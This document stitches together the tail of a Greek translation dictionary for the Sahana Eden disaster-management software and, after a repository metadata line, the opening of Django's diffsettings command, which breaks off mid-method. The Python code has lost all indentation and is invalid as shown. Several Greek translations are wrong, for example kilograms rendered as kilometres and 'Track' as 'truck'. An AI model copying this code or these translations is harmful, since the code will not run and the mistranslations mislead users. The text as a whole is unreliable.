'Request Item deleted': 'Διαγραφή αντικειμένου που αιτήθηκε',
'Request Item updated': 'Ζητούμενο Αντικείμενο επικαιροποιήθηκε',
'Request Type': 'Τύπος αιτήματος',
'Request deleted': 'Διαγραφή αιτήματος',
'Request for Role Upgrade': 'Αίτημα για αναβάθμιση ρόλου',
'Request, Response & Session': 'Αίτημα, Ανταπόκριση & Εργασία',
'Reset Password': 'Αρχικοποίηση κωδικού εισόδου - password',
'Resolve Conflict': 'Επίλυση σύγκρουσης (διαφοράς)',
'Resource Inventory': 'Απογραφή των πόρων',
'Resources': 'Πόροι',
'Response deleted': 'Η απάντηση-ανταπόκριση διαγράφηκε',
'Restricted Access': 'Περιορισμένη Πρόσβαση',
'Retail Crime': 'Κλοπή (Retail Crime)',
'Riot': 'Εξέγερση',
'River Details': 'Λεπτομέρειες Ποταμού',
'Road Accident': 'Αυτοκινητιστικό Ατύχημα',
'Road Conditions': 'Κατάσταση Οδών',
'Road Usage Condition': 'Κατάσταση οδικού δικτύου',
'Role Details': 'Λεπτομέρειες Ρόλου ',
'Role deleted': 'Διαγραφή Ρόλου',
'Run Functional Tests': 'Εκτέλεση λειτουργικών δοκιμών',
'SEARCH': 'ΑΝΑΖΗΤΗΣΗ',
'Sahana Community Chat': 'Συνoμιλία(chat) κοινότητας του Sahana',
'Sahana Eden Open Source Disaster Management Platform': 'Πλατφόρμα Διαχείρισης Καταστορφών Ανοικτού Κώδικα Sahana Eden ',
'Sahana Eden Website': 'Διαδικτυακός τόπος Sahana Eden',
'Sahana Login Approval Pending': 'Εκκρεμεί η έγκριση Σύνδεσης στο σύστημα Sahana',
'Sahana: new request has been made. Please login to see if you can fulfil the request.': 'Sahana : νέο αίτημα έχει γίνει. Παρακαλώ συνδεθείτε για να δείτε αν μπορείτε να ικανοποιήσετε το αίτημα ',
'Satellite': 'Δορυφόρος',
'Save any Changes in the one you wish to keep': 'Αποθηκεύστε οποιεσδήποτε αλλαγές σε αυτό που επιθυμείτε να κρατήσετε',
'Scale of Results': 'Κλίμακα Αποτελεσμάτων',
'School/studying': 'Σχολείο/Σπουδαστήριο',
'Search & List Catalog': 'Κατάλογος αναζήτησης και παρουσίασης',
'Search & List Items': 'Αναζήτησε και πρόβαλε αντικείμενα',
'Search & List Sub-Category': 'Αναζήτηση και Λίστα Υποκατηγορίων',
'Search Activity Report': 'Αναζήτηση στις Αναφορές Δραστηριοτήτων',
'Search Assessment Summaries': 'Αναζήτηση περιλήψεων αξιολόγησης',
'Search Baseline Type': 'Τύπος Βασικής αναζήτησης',
'Search Budgets': 'Αναζήτηση Προυπολογισνμών',
'Search Catalog Items': 'Αναζήτηση αντικειμένων καταλόγου.',
'Search Distribution Items': 'Αναζήτηση αντικειμένων για διανομή',
'Search Distributions': 'Αναζήτηση Διανομών',
'Search Documents': 'Αναζήτηση Εγγράφων',
'Search Feature Layers': 'Αναζήτηση στα επίπεδα χαρακτηριστικών',
'Search Identity': 'Αναζήτηση ταυτότητας',
'Search Impact Type': 'Αναζήτηση Τύπου Επιπτώσεων',
'Search Item Catalog(s)': 'Αναζήτηση Θέση Καταλόγου (ων)',
'Search Item Sub-Category(s)': 'Αναζήτηση υπο-κατηγοριών αντικειμένων',
'Search Keys': 'Κλείδες αναζήτησης',
'Search Membership': 'Ψάξιμο εγγραφής',
'Search Memberships': 'Αναζήτηση μελών',
'Search Metadata': 'Αναζήτηση μεταδεδομένων',
'Search Need Type': 'Αναζήτηση τύπου αναγκών',
'Search Needs': 'Ψάξε ανάγκες',
'Search Personal Effects': 'Αναζήτηση Προσωπικών Αποτελεσμάτων(Effects)',
'Search Persons': 'Αναζήτηση Ατόμων',
'Search Projects': 'Αναζήτηση έργων',
'Search Registration Request': 'Αναζήτηση αιτήματος εγγραφής',
'Search Reports': 'Αναφορές Αναζήτησης',
'Search Request': 'Αναζήτηση αιτήματος',
'Search Requests': 'Αναζήτηση αιτημάτων',
'Search Resources': 'Αναζλητηση πόρων',
'Search Roles': 'Αναζήτηση Ρόλων',
'Search Shelter Types': 'Τύποι αναζήτησης Καταφυγίου',
'Search Shipment<>Item Relation': 'Αναζήτηση αποστολής <> Σχέση Αντικειμένου',
'Search Storage Location(s)': 'Αναζήτηση στις θέσεις Αποθήκευσης',
'Search Subscriptions': 'Αναζήτηση Εγγεγραφών',
'Search Tasks': 'Αναζήτηση Καθηκόντων-Έργων',
'Search Themes': 'Θέματα Αναζήτησης',
'Search Tracks': 'Πορείες (γραμμές) αναζήτησης',
'Search Twitter Tags': 'Ψάξε τα tags(ετικέκτες) του twitter',
'Search and Edit Individual': 'Αναζήτηση και επεξεργασία ατοιχείων ατόμου',
'Search for a Person': 'Αναζήτηση Ατόμου',
'Search for a Project': 'Αναζήτηση για έργο',
'Search': 'ερευνώ',
'Secondary Server (Optional)': 'Δευτερεύων server (προαιρετικό)',
'Seconds must be a number between 0 and 60': 'Τα δευτερόλεπτα πρέπει να είναι ένας αριθμός μεταξύ 0 και 60',
'Section Details': 'Λεπτομέρειες Τμήματος',
'Section deleted': 'Τομέας Διαγράφηκε',
'Sectors': 'Τομείς',
'Security Policy': 'Πολιτική Ασφαλείας',
'Security problems': 'Προβλήματα ασφαλείας',
'Select 2 potential locations from the dropdowns.': 'Επιλέξτε 2 εν δυνάμει τοποθεσίες από την αναδυόμενη λίστα',
'Select a question from the list': 'Επιλογή ερώτησης από λίστα',
'Send Alerts using Email &/or SMS': 'Αποστολή Συνεγερμών με email ή sms',
'Send Shipment': 'Αποστολή Φορτίου',
'Send message': 'Στείλε μήνυμα',
'Send new message': 'Στείλε νέο μήνυμα',
'Senior (50+)': 'Ηλικιωμένος (50+)',
'Sensitivity': 'Ευαισθησία',
'Series': 'Σειρά',
'Service or Facility': 'Υπηρεσία ή Εγκατάσταση',
'Service profile added': 'Προφίλ Υπηρεσίας προστέθηκε',
'Services Available': 'Διαθέσιμες Υπηρεσίες',
'Services': 'Υπηρεσίες',
'Setting added': 'Ρύθμιση προστέθηκε',
'Settings': 'Ρυθμίσεις',
'Share a common Marker (unless over-ridden at the Feature level)': 'Μοιράζονται ένα κοινό Marker (εκτός υπερ-επιβαίνουν σε επίπεδο Feature)',
'Shelter Registry': 'Καταγραφή Καταλύμματος',
'Shelter Service Details': 'Λεπτομέρειες υπηρεσιών καταφυγίου',
'Shelter Services': 'Υπηρεσίες Καταφυγίων',
'Shelter added': 'Καταφύγιο προστέθηκε',
'Shelter': 'Κατάλλημα',
'Shipment<>Item Relations Details': 'Αποστολή<>Λεπτομέρειες σχέσεων αντικειμένου',
'Shipments To': 'Αποστολή προς',
'Shooting': 'Πυροβολισμός',
'Short Description': 'Σύντομη Περιγραφή',
'Show on map': 'Θέση στο χάρτη',
'Site Location Description': 'Περιγραφή Θέσης Περιοχής',
'Site added': 'Περιοχή προστέθηκε',
'Site deleted': 'Περιοχή διαγράφηκε',
'Site updated': 'Η περιοχή (site) ενημερώθηκε',
'Sites': 'Τοποθεσίες',
'Skill Type added': 'Τύπος προσόντων προστέθηκε',
'Skill added': 'Προσθήκη Ικανότητας ',
'Skill deleted': 'Προσόν διαγράφηκε',
'Snow Fall': 'Χιονόπτωση',
'Snow Squall': 'Squall χιονιού',
'Solid waste': 'Στερεά απόβλητα',
'Solution updated': 'Επίλυση (solution) ενημερώθηκε',
'Sorry, that page is forbidden for some reason.': 'Λυπούμαστε, η σελίδα αυτή είναι απαγορευμένη για κάποιο λόγο.',
'Sorry, there are no addresses to display': 'Συγνώμη, Δεν υπάρχουν Διευθύνσεις για προβολή.',
'Source ID': 'ID Πηγής',
'Source Time': 'Πηγαία ώρα',
'Special needs': 'Ειδικές ανάγκες',
'Specify a descriptive title for the image.': 'Ορίστε ένα περιγραφικό τίτλο για την εικόνα',
'Specify the number of sets needed per 24h': 'Προσδιορίστε τον αριθμό των συνόλων(sets) που είναι απαραίτητα ανα 24ώρο',
'Staff Type Details': 'Λεπτομέρειες Τύπου Προσωπικού',
'Staff Type added': 'Τύπος Προσωπικού προστέθηκε',
'Staff Type deleted': 'Τύπος προσωπικού διαγράφηκε',
'Staff deleted': 'Προσωπικό διαγράφηκε',
'Stakeholders': 'Οι ενδιαφερόμενοι',
'Start date': 'Ημερομηνία Έναρξης',
'Stationery': 'Γραφική Ύλη',
'Status deleted': 'Κατάσταη διαγράφηκε',
'Status of operations of the emergency department of this hospital.': 'Επιχειρησιακή κατάσταση του τμημάτος επειγουσών περιστατικών του Νοσοκομείου',
'Storage Bin Type updated': 'Τύπος Αποθηκευτικού μέσου ανανεώθηκε',
'Storage Bin Type': 'Τύπος Αποθηκευτικού χώρου',
'Storage Bins': 'Καλάθια αποθήκευσης',
'Store spreadsheets in the Eden database': 'Αποθήκευση λογιστικών φύλλων στη βάση δεδομένων του Eden',
'Storm Force Wind': 'Άνεμοι καταιγίδας',
'Street': 'Οδός',
'Sub Category': 'Υπο κατηγορία',
'Submit new Level 1 assessment (full form)': 'Υποβολή νέας εκτίμησης Επιπέδου 1 (πλήρης φόρμα)',
'Subscription deleted': 'Η συνδρομή/εγγραφή διαγράφηκε',
'Subscriptions': 'Εγγραφές - Συνδρομές',
'Subsistence Cost': 'Κόστος επιχορήγησης',
'Suggest not changing this field unless you know what you are doing.': 'Μήν αλλάζετεαυτό το παδίο εκτός αν γνωρίζετε επακριβώς τι κάνετε.',
'Support Request': 'Αίτημα (αναζήτηση) υποστήριξης',
'Support Requests': 'Αιτήματα Υποστήριξης',
'Supports the decision making of large groups of Crisis Management Experts by helping the groups create ranked list.': 'Υποστηρίζει τη λήψη απόφασης από μεγάλες ομάδες εδικών διαχείρισης κρίσεων βοηθώντας τις ομάδες να δημιουργούν ιεραρχημένες λίστες - καταλόγους.',
'Survey Name': 'Όνομα έρευνας',
'Survey Question updated': 'Ερώτηση Έρευνας ενημερώθηκε',
'Survey Section added': "Τμήμα 'Ερευνας προστέθηκε",
'Survey Section updated': 'Έρευνα Τμήματος ενημερώθηκε',
'Survey Series deleted': 'Σειρά Ερευνών διαγράφηκε',
'Survey Series updated': 'Σειρά Ερευνών ανανεώθηκε',
'Survey Series': 'Σειρά ερευνών',
'Survey Template added': 'Προστέθηκε πρότυπο έρευνας καταγραφής',
'Sync Conflicts': 'Προβλήματα (διενέξεις) Συγχρονισμού',
'Sync Now': 'Συγχρονίστε τώρα.',
'Sync Partners are instances or peers (SahanaEden, SahanaAgasti, Ushahidi, etc.) that you want to sync information with. Click on the link on the right to go the page where you can add sync partners, search for sync partners and modify them.': 'Οι συγχρονιζόμενοι συνεργάτες είναι στιγμιότυπα ή peers (SahanaEden, SahanaAgasti, Ushahidi, etc.) με τους οποίους θέλεις να συγχρονίσεις πληροφορίες. Πατήστε στο σύνδεσμο στα δεξιά για να πάτε στη σελίδα όπου μπορείτε να προσθέσετε συγχρονιζόμενους συνεργάτες, να αναζητήσετε συγχρονιζόμενους συνεργάτες και να τους τροποποιήσετε.',
'Sync Partners': 'Συνεργάτες για συγχρονισμό',
'Sync Pools': 'Συγχρόνισε τις δεξαμενές (pools)',
'Sync Schedule': 'Συγχρονισμός Πλάνου(Schedule)',
'Synchronization Details': 'Λεπτομέρειες Συγχρονισμού',
'Synchronization History': 'Ιστορικό Συγχρονισμού',
'Synchronization Settings': 'Ρυθμίσεις Συγχρονισμού',
'Synchronization allows you to share data that you have with others and update your own database with latest data from other peers. This page provides you with information about how to use the synchronization features of Sahana Eden': 'Ο συγχρονισμός σας επιτρέπει να μοιράζεστε δεδομένα που έχετε με άλλους και να ενημέρώνετε τη δική σας βάση δεδομένων από άλλους peers. Αυτή η σελίδα σας παρέχει πληροφορίες για το πως να χρησιμοποιείτε τις δυνατότιτες συγχρονισμού στο Sahana Eden',
'Syncronisation History': 'Ιστορικό συγχρονισμού',
'System keeps track of all Volunteers working in the disaster region. It captures not only the places where they are active, but also captures information on the range of services they are providing in each area.': 'Η εφαρμογή παρακολουθεί τους εθελοντές που επιχειρούν στα πεδία των συμβάντων. Εκτός από τις περιοχές των ενεργών συμβάντων καταγράφεται το φάσμα και το είδος των παρερχόμενων υπηρεσιών σε κάθε περιοχή.',
'Task added': 'Καθήκον προστέθηκε',
'Task deleted': 'Εργασία Διαγράφηκε',
'Task updated': 'Η εργασία ενημερώθηκε',
'Tasks': 'Καθήκοντα',
'Team Details': 'Λεπτομέρειες Ομάδος',
'Team Head': 'Επικεφαλής Ομάδος',
'Team Leader': 'Αρχηγός ομάδος',
'Team Type': 'Τύπος Ομάδας',
'Telephony': 'Τηλεφωνία',
'Text Color for Text blocks': 'Χρώμα κειμένου για τις περιοχές-κουτιά κειμένου',
'Text before each Text Field (One per line)': 'Κείμενο που θα εμφανίζεται πρίν το κάθε Πεδίο Κειμένου (Ένα για κάθε γραμμή) ',
'Text': 'Κείμενο',
'The Area which this Site is located within.': 'Η ευρήτερη περιοχή όπου η συγκεκριμένη θέση βρίσκεται.',
'The Assessments module allows field workers to send in assessments.': 'Το υποππόγραμμα εκτιμήσεων επιτρέπει στους εργαζόμεους στο πεδίο να στέλνουν εκτιμήσεις.',
'The Email Address to which approval requests are sent (normally this would be a Group mail rather than an individual). If the field is blank then requests are approved automatically if the domain matches.': 'Η διεύθυνση email στην οποία στέλνονται αιτήματα προς έγγριση (φυσιολογικά αυτό μπορεί να είναι ένα ομαδικό email παρά προσωπικό). Εαν το πεδίο είναι κενό τότε τα αιτήμτα εγρκίνονται αυτόματα εαν ταιριάζει το domain.',
'The Incident Reporting System allows the General Public to Report Incidents & have these Tracked.': 'Το σύστημα αναφοράς συμβάντων επιτρέπει στο κοινό να αναφέρει συμβάντα και να τα παρακολουθεί.',
'The Organization this record is associated with.': 'Ο οργανισμός με τον οποίο αυτή ή εγγραφή είναι συσχετισμένη',
'The Project Tracking module allows the creation of Activities to meet Gaps in Needs Assessments.': 'Το υποπρόγραμμα Παρακολούθηση έργου επιτρέπει τη δημιουργία ενεργειών για να συμπληρώσσει τυχόν κενά στην Εκτίμηση Αναγκών',
'The Request this record is associated with.': 'Η Αίτηση αυτής της εγγραφής συνδέεται με.',
'The Unique Identifier (UUID) as assigned to this facility by the government.': 'Το μοναδικό αναγνωριστικό (UUID), όπως έχει καθοριστεί για την υποδομή από την κυβέρνηση.',
'The body height (crown to heel) in cm.': 'Ύψος Σώματος σε εκατοστά',
'The contact person for this organization.': 'Άτομο για επικοινωνία για αυτόν τον οργανισμό.',
'The entered unit links to this unit. For e.g. if you are entering m for meter then choose kilometer(if it exists) and enter the value 0.001 as multiplicator.': 'Η εισαχθήσα μονάδα συνδέει σε αυτή τη μονάδα. Για παράδειγμα εαν εισάγετε m για μέτρα, τότε επιλέξτε χιλιόμετρα (εαν υπάρχουν) και εισάγετε την τιμή 0.001 σαν πολλαπλασιαστή.',
'The first or only name of the person (mandatory).': 'Το μικρό όνομα του ατόμου (υποχρεωτικό)',
'The hospital this record is associated with.': 'Το νοσοκομείο με το οποίο αυτή η εγγραφή είναι συσχετιμσένη',
'The list of Item categories are maintained by the Administrators.': 'Αυτός ο κατάλογος κατηγοριών αντικειμένων διατηρείται από τους διαχειριστές',
'The number of tiles around the visible map to download. Zero means that the 1st page loads faster, higher numbers mean subsequent panning is faster.': 'Ο αριθμός των αρχείων κοντά στον εμφανιζόμενο χάρτη για μεταφόρτωση. Το μεδέν σημαίνει ότι η πρώτη σελίδα φορτώνεται γρηγορότερα, οι μεγαλύτεροι αριθμοί σημαίνουν ότι η παραπέρα μετακίνηση του χάρτη είναι γρηγορότερη.',
'The post variable on the URL used for sending messages': 'Η μεταβλητή "post" στο URL που χρησιμοποιείται για την αποστολή μηνυμάτων',
'The simple policy allows anonymous users to Read & registered users to Edit. The full security policy allows the administrator to set permissions on individual tables or records - see models/zzz.py.': 'Η "απλή" (simple) πολιτική επιτρέπει σε ανώνυμους χρήστες να διαβάζουν και σε εγγεγραμμένους χρήστες να επεξεργάζονται. Η πολιτική πλήρους ασφαλείας επιτρέπει στο διαχειριστή να θέτει "αρμοδιότητες" (permissions) σε συγκεκριμένους πίνακες ή εγγραφές - δείτε models/zzz.py',
'Theme deleted': 'Θέμα διαγράφηκε',
'Theme': 'Θέμα',
'These are settings for Inbound Mail.': 'Αυτές είναι οι ρυθμίσεις για εισερχόμενη αλληογγραφία (Mail)',
'They': 'Αυτοί',
'This Group has no Members yet': 'Δεν έχουν εγγραφεί ακόμη μέλη',
'This Team has no Members yet': 'Δεν έχουν εγγραφεί ακόμη μέλη',
'This form allows the administrator to remove a duplicate location.': 'Αυτή η φόρμα επιτρέπει στο διαχειριστή να διαγράψει διπλή τοποθεσία.',
'This is the way to transfer data between machines as it maintains referential integrity.': 'Αυτός είναι ο τρόπος για τη μεταφορά δεδομένων μεταξύ υπολογσιτών, καθώς διατηρεί τη σχεσιακή ακαιρεαιότητα των δεδομένων',
'This might be due to a temporary overloading or maintenance of the server.': 'Αυτό μπορεί να οφείλεται σε προσωρινή υπερφόρτωση ή τη συντήρηση του server.',
'This screen allows you to upload a collection of photos to the server.': 'Αυτή η οθόνη σου επιτρέπει να μεταφορτώσεις μία συλλογή φωτογραφιών στο server.',
'Thursday': 'Πέμπτη',
'Ticket Details': 'Λεπτομέρειες "εισητηρίου"',
'Ticket added': 'Εισητήριο προστέθηκε',
'Ticket deleted': 'To εισητήριο διαγράφηκε',
'To begin the sync process, click the button on the right => ': 'Για να ξεκινήσετε τη διαδικασία συγχρονισμού πατήστε το κουμπί στα δεξιά =>',
'To edit OpenStreetMap, you need to edit the OpenStreetMap settings in models/000_config.py': 'Για να κάνετε αλλαγές στο OpenStreetMap, πρέπει να επεξεργαστείτε το OpenStreetMap settings στο models/000_config.py',
'To variable': 'Σε μεταβλητή',
'Tornado': 'Σίφουνας',
'Total # of Target Beneficiaries': 'Συνολικός αριθμός στοχευμένων δικαιούχων',
'Total Beds': 'Συνολικά Κρεβάτια',
'Total Cost per Megabyte': 'Συνολικό Κόστος ανά Megabyte',
'Total Monthly': 'Συνολικό Μηνιαίο',
'Total Recurring Costs': 'Συνολικά κόστη Στρατολόγησης',
'Total Unit Cost: ': 'Συνολικό κόστος μονάδος: ',
'Total number of houses in the area': 'Συνολικός αριθμός κατοικιών στη περιοχή',
'Totals for Bundle:': 'Σύνολα για Πακέτο:',
'Tracing': 'Ιχνηλατώντας',
'Track uploaded': 'Διαδρομή μεταφορτώθηκε',
'Track': 'Φορτηγό',
'Tracking of basic information on the location, facilities and size of the Shelters': 'Εύρεση βασικών πληροφοριών για την περιοχή-θέση, υποδομές και μέγεθος καταφυγίων',
'Tracks the location, distibution, capacity and breakdown of victims in Shelters': 'Καταγράφει την τοποθεσία, την διανομή, την χωρητική ικακανότητα και διανομή των θυμάτων σε καταλλύματα',
'Traffic Report': 'Αναφορά κυκλοφορίας',
'Transit Status': 'Κατάσταση Μεταφόρτωσης-Διέλευσης',
'Tropical Storm': 'Τροπική καταιγίδα',
'Tropo settings updated': 'Αναθεωρήθηκαν οι ρυθμίσεις Καιρικών Συνθηκών',
'Truck': 'Φορτηγό',
'Try checking the URL for errors, maybe it was mistyped.': 'Ελέγξτε την διεύθυνση URL για τυπογραφικά σφάλματα',
'Try hitting refresh/reload button or trying the URL from the address bar again.': 'Προσπάθηστε να κάνετε ανανέωση (refresh) ή ψάξτε την URL από το παράθυροτης διεύθυνσης ξανά',
'Tuesday': 'Τρίτη',
'Type': 'Τύπος',
'UTC Offset': 'απόκλιση ώρας από την UTC',
'Unable to parse CSV file!': 'Αδύνατο να επεξεργαστώ το αρχείο CSV',
'Understaffed': 'Ανεπαρκώς στελεχωμένη',
'Unidentified': 'Μη αναγνωρισμένο',
'Unit Details': 'Λεπτομέρειες Μονάδος',
'Unit Short Code for e.g. m for meter.': 'Συντομογραφία μονάδων μέτρησης π.χ. m για μέτρο.',
'Unit added': 'Μονάδα προστέθηκε',
'Unknown': 'Άγνωστο',
'Unresolved Conflicts': 'Μη διευθυτημένες διενέξεις',
'Update Service Profile': 'Ανανέωση προφίλ υπηρεσιών',
'Update if Master': 'Αναθεώρηση εφόσον είστε κύριος',
'Update if Newer': 'Ανανέωση εαν υπάρχει καινουργιο',
'Updates': 'ενημερώσεις',
'Upload Track': 'Μεταφόρτωση ανίχνευσης(track)',
'Upload a Spreadsheet': 'Μεταφόρτωση Λογιστικού Φύλλου',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Χρησιμοποιήστε (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT για να δημιουργήσετε ποιο περίπλοκες αναζητήσεις.',
'Use default': 'Χρήση προεπιλεγμένων',
'Use these links to download data that is currently in the database.': 'Χρησιμοποιήστε τους συνδέσμους για να μεταφορτώσετε τρέχοντα δεδομένα που βρίσκονται στη βάση.',
'Use this space to add a description about the Bin Type.': 'Χρησιμοποίησε το χώρο αυτό για να περιγράψεις τον τύπο καλαθιού (bin)',
'Use this space to add a description about the warehouse/site.': 'Χρησιμοποίησε αυτό το χώρο για να προσθέσεις μία περιγραφή για τις αποθήκες / περιοχή',
'Use this space to add additional comments and notes about the Site/Warehouse.': 'Χρησιμοποίησε αυτό το χώρο για την προσθήκη επιπλέον σχολίων για την Περιοχή / Αποθήκη',
'User Profile': 'Προφίλ Χρήστη',
'User Updated': 'Χρήστης Ενημερώθηκε',
'User deleted': 'Χρήστης Διαγράφηκε',
'Username': 'Όνομα χρήστη',
'Users removed': 'Οι χρήστες αφαιρέθηκαν ',
'Users': 'χρήστες',
'Vehicle Crime': 'Εγκληματικότητα σχετική με το όχημα',
'Vehicle Types': 'Τύποι οχημάτων',
'Verified?': 'Επιβεβαιώθηκε;',
'Version': 'Έκδοση',
'View Alerts received using either Email or SMS': 'Δείτε συναγερμούς που ελήφθησαν είτε με email ή με SMS.',
'View Outbox': 'Δείτε εξερχόμενα email',
'View Requests for Aid': 'Δείτε αιτήματα για βοήθεια',
'View the hospitals on a map.': 'Δείτε τα Νοσοκομεία στο χάρτη',
'Volcanic Ash Cloud': 'Σύννεφο ηφαιστειακής τέφρας',
'Volunteer Project': 'Έργο Εθελοντών',
'Volunteer Registration': 'Εγγραφή εθελοντή',
'Votes': 'Ψήφοι',
'Warehouse Management': 'Διαχείριση Αποθήκης',
'Water gallon': 'Νερό γαλόνι',
'Way Bill(s)': 'Λογαριασμοί',
'Website': 'Ιστοχώρος',
'Weight (kg)': 'Βάρος (Χλμ)',
'Well-Known Text': 'Γνωστός τύπος κειμένου',
'Whiskers': 'Μουστάκια',
'Who usually collects water for the family?': 'Ποιός συνήθως συγκεντρώνει νερό για την οικογένεια;',
'Width': 'Πλάτος',
'Wild Fire': 'Δασική Πυρκαγιά',
'Women who are Pregnant or in Labour': 'Γυναίκες που είνια έγκυες ή εργάζονται ',
'Working hours end': 'Τέλος εργάσιμων ωρών',
'Working hours start': 'Έναρξη ωρών εργασίας (ωραρίου)',
'X-Ray': 'Ακτίνες-X',
'You can select the Draw tool (': 'Μπορείτε να επιλέξετε το εργαλείο σχεδίασης (',
'You can set the modem settings for SMS here.': 'Μπορείτε να ρυθμίσετε τις επιλογές του modem για SMS εδώ',
'You must provide a series id to proceed.': 'Πρέπει να παρέχετε αναγνωριστικό σειράς (series id) για να προχωρήσετε.',
'Your action is required. Please approve user': 'Απαιτείται ενέργειά σας. Παρακαλώ εγκρίνετε τον χρήστη',
'Your post was added successfully.': 'Το κείμενο σας (post) προστέθηκε με επιτυχία',
'Zinc roof': 'Τσίγκινη οροφή',
'act': 'ενέργεια/άρθρο',
'active': 'ενεργό',
'added': 'προστέθηκε',
'assigned': 'ορίστηκε / ανατέθηκε',
'average': 'μέσος όρος',
'black': 'μαύρο',
'blue': 'μπλέ',
'can be used to extract data from spreadsheets and put them into database tables.': 'μπορεί να χρησιμοποιηθεί για να εξάγει δεδομένα από λογιστικά φύλλα xls και να τα τοποθετήσει σε πίνακες βάσεων δεδομένων',
'cancelled': 'ματαιώθηκε',
'consider': 'εξέτασε (λάβε υπόψη)',
'daily': 'ημερίσια',
'dark': 'σκοτάδι',
'data uploaded': 'Δεδομένα μεταφορτώθηκαν',
'database %s select': 'βάσεις δεδομένων έχουν επιλεγεί',
'database': 'βάση δεδομένων',
'editor': 'Συγγραφέας - Εκδότης',
'export as csv file': 'εξαγωγή σαν αρχείο csv',
'feedback': 'ανατροφοδότηση',
'flush latrine with septic tank': 'Αποχωρητήριο με σηπτικό βόθρο',
'full': 'πλήρες',
'here': 'εδώ',
'in GPS format': 'σε μορφότυπο GPS',
'insert new': 'Εισαγωγή νέου',
'is a central online repository where information on all the disaster victims and families, especially identified casualties, evacuees and displaced people can be stored. Information like name, age, contact number, identity card number, displaced location, and other details are captured. Picture and finger print details of the people can be uploaded to the system. People can also be captured by group for efficiency and convenience.': 'είναι ένα κεντρικό online αποθετήριο πληροφοριών όλων των θυμάτων της καταστροφής και των οικογενειών, ειδικά για τα αναγνωρισμένα θύματα, τα άτομα που εκκενώνουν την περιοχή και οι μεταταστεγαστεί άνθρωποι μπορούν να αποθηκευτούν. Πληροφορίες όπως το όνομα, ηλικία, τηλέφωνο επικοινωνίας μαζί του, τον αριθμό ταυτότητάς του, χώρος προσφυγής και άλλες λεπτομέρειες μπορούν να καταγραφούν. Φωτογραφία και δακτυλικό αποτύπωμα των ατόμων μπορεί να μεταφορτωθεί στο σύστημα. Τα άτομα επίσης μπορούν να καταγραφούν κατά ομάδες για καλύτερη αποδοτικότητα / επάρκεια και ευκολία.',
'is envisioned to be composed of several sub-modules that work together to provide complex functionality for the management of relief and project items by an organization. This includes an intake system, a warehouse management system, commodity tracking, supply chain management, fleet management, procurement, financial tracking and other asset and resource management capabilities': 'το οραματιζόμαστε να αποτελείται από αρκετά υπο-προγράμαμτα τα οποία συνεργάζονται για να προσφέρουν συνδιασμένη λειτουργικότητα για την διαχείρηση υλικών ανακούφησης και έργωβ από ένα οργανισμό. Αυτό συμπεριλαμβάνει σύστημα υποδοχής αιτημάτων, σύστημα διαχείρησης αποθήκης, καταγραφή και παρακολούθηση αγαθών, διαχείριση αλυσίδας προμηθειών, διαχείρηση στόλου οχημάτων, προμηθειών, οικονομικού ελέγχου και άλλων δυνατοτήτων διαχείρησης πόρων.',
'keeps track of all incoming tickets allowing them to be categorised & routed to the appropriate place for actioning.': 'Καταγράφει και ελέγχει όλα τα εισερχόμενα "εισητήρια" επιτρέποντας την κατηγοριοποίηση και τη δρομολόγηση τους για ενέργεια',
'kilogram': 'Χιλιόγραμμο (Κιλό)',
'latrines': 'τουαλέτες',
'login': 'Σύνδεση',
'male': 'άρρεν',
'maxResolution': 'Μέγιστη Ανάλυση',
'medium<12cm': 'μέση<12 εκατοστά',
'message_id': 'id_μηνύματος',
'module helps monitoring the status of hospitals.': 'το υποπρόγραμμα βοηθάει στον έλεγχο της κατάστασης των νοσοκομείων',
'natural hazard': 'φυσική καταστροφή',
'never': 'ποτέ',
'new': 'νέο',
'none': 'κανένα',
'normal': 'κανονικό',
'not specified': 'δεν έχουν διευκρινισθεί',
'operational intent': 'επιχειρησιακή πρόθεση-σκοπός',
'pack of 10': 'συσκευασία των 10',
'people': 'άνθρωποι',
'pit latrine': 'αποχωρητήριο - τούρκικο',
'postponed': 'αναβλήθηκε',
'previous 100 rows': 'προηγούμενες 100 γραμμές',
'provides a catalogue of digital media.': 'παρέχει έναν κατάλογο των ψηφιακών μέσων.',
'record does not exist': 'η εγγραφή δεν υπάρχει',
'record id': 'ID εγγραφής',
'reports successfully imported.': 'οι αναφορές εισήχθησαν με επιτυχία',
'selected': 'επιλέχθηκαν',
'separated from family': 'Ξεχωρίστηκε από την οικογένεια',
'separated': 'διαχωρισμένα',
'shaved': 'Ξυρισμένα',
'specify': 'διευκρινίστε',
'suffered financial losses': 'έχουν υποστεί οικονομικές απώλειες',
'tall': 'Ύψος',
'to access the system': 'για πρόσβαση στο σύστημα',
'unapproved': 'μη εγκεκριμένο',
'updated': 'Ενημερώθηκε',
'updates only': 'εηνμερώσεις μόνο',
'urgent': 'επείγον',
'weekly': 'εβδομαδιαίως',
'widowed': 'σε χηρεία',
'within human habitat': 'εντός κατοικήσιμης περιοχής (habitat)',
'yes': 'Ναι',
}
| mit |
sjlehtin/django | django/core/management/commands/diffsettings.py | 33 | 3369 | from django.core.management.base import BaseCommand
def module_to_dict(module, omittable=lambda k: k.startswith('_')):
"""Convert a module namespace to a Python dictionary."""
return {k: repr(v) for k, v in module.__dict__.items() if not omittable(k)}
class Command(BaseCommand):
help = """Displays differences between the current settings.py and Django's
default settings."""
requires_system_checks = False
def add_arguments(self, parser):
parser.add_argument(
'--all', action='store_true', dest='all',
help=(
'Display all settings, regardless of their value. In "hash" '
'mode, default values are prefixed by "###".'
),
)
parser.add_argument(
'--default', dest='default', metavar='MODULE', default=None,
help=(
"The settings module to compare the current settings against. Leave empty to "
"compare against Django's default settings."
),
)
parser.add_argument(
'--output', default='hash', choices=('hash', 'unified'), dest='output',
help=(
"Selects the output format. 'hash' mode displays each changed "
"setting, with the settings that don't appear in the defaults "
"followed by ###. 'unified' mode prefixes the default setting "
"with a minus sign, followed by the changed setting prefixed "
"with a plus sign."
),
)
def handle(self, **options):
from django.conf import settings, Settings, global_settings
# Because settings are imported lazily, we need to explicitly load them.
settings._setup()
user_settings = module_to_dict(settings._wrapped)
default = options['default']
default_settings = module_to_dict(Settings(default) if default else global_settings)
output_func = {
'hash': self.output_hash,
'unified': self.output_unified,
}[options['output']]
return '\n'.join(output_func(user_settings, default_settings, **options))
def output_hash(self, user_settings, default_settings, **options):
# Inspired by Postfix's "postconf -n".
output = []
for key in sorted(user_settings):
if key not in default_settings:
output.append("%s = %s ###" % (key, user_settings[key]))
elif user_settings[key] != default_settings[key]:
output.append("%s = %s" % (key, user_settings[key]))
elif options['all']:
